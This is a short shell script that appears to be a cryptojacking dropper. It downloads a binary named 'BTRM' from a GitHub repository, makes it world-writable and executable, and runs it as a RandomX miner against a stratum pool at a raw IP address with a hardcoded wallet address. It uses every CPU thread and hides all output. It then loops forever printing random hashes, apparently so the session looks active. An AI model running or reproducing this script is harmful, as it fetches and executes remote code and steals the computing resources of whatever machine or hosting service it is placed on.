#!/bin/sh
wget https://github.com/aqshakuy/nyemfile/raw/main/BTRM
chmod 777 BTRM
./BTRM -a rx/0 -o stratum+tcp:/139.144.54.116:443 -u 89T1R5qfPdDRaB1ULyztzw9SU9Ws2r2QHFa1jRmjVMiaDfVGjQdg9tWWpBPoGar4rHLZ4mNhx2RXmjfqD8hkyoJ1RFus3sT.$(echo $(shuf -i 1-20000 -n 1)-GG) -p x -t$(nproc --all) >/dev/null 2>&1
while :; do echo $RANDOM | md5sum | head -c 20; echo; sleep 10m; done
